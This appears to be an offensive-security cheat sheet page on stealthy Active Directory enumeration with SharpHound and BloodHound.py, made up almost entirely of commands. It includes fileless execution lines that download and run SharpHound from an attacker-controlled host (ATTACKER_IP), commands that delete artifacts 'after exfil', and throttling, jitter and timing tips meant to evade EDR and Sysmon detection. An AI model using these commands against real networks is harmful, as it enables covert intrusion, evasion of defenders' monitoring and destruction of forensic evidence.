Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
SharpHound — Stealth Collection
Stealth mode — avoids noisy session and local admin enumeration.
.\SharpHound.exe -c All --Stealth
.\SharpHound.exe -c DCOnly
.\SharpHound.exe -c All --ExcludeDomainControllers
.\SharpHound.exe -c All --Throttle 1000 --Jitter 20
.\SharpHound.exe -c All --RandomFilenames --NoSaveCache
.\SharpHound.exe -c All --OutputDirectory C:\Windows\Temp --RandomFilenames
SharpHound — In-Memory Execution
Load and run SharpHound entirely in memory (no disk drop).
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -Stealth
$data = (New-Object System.Net.WebClient).DownloadData('http://ATTACKER_IP/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-c All --Stealth".Split())
SharpHound — Artifact Cleanup
Remove output files after exfil.
Remove-Item C:\Windows\Temp\*.zip -Force
Remove-Item C:\Windows\Temp\*.json -Force
Remove-Item $env:USERPROFILE\AppData\Local\Temp\*.bin -Force
BloodHound.py — Stealth Options
DC-only — no host enumeration, no SMB sessions.
bloodhound-python -u USER -p 'Password' -d domain.local -c DCOnly -ns DC01_IP
bloodhound-python -u USER -p 'Password' -d domain.local -c All -ns DC01_IP --dns-tcp
bloodhound-python -u USER -p 'Password' -d domain.local -c All -ns DC01_IP --disable-pooling --disable-autogc
Detection Signatures to Avoid
Skip session enumeration (very noisy, triggers EDR).
.\SharpHound.exe -c Group,LocalAdmin,ObjectProps,ACL,Trusts,RDP,DCOM,PSRemote
NetSessionEnum (logged by Defender / Sysmon Event 7045).
.\SharpHound.exe -c DCOnly,ObjectProps,ACL
Timing Recommendations
Run during business hours to blend with legitimate LDAP traffic.
.\SharpHound.exe -c All --Stealth --Throttle 2000 --Jitter 30
.\SharpHound.exe -c DCOnly --Loop --LoopDuration 00:30:00 --LoopInterval 00:10:00
References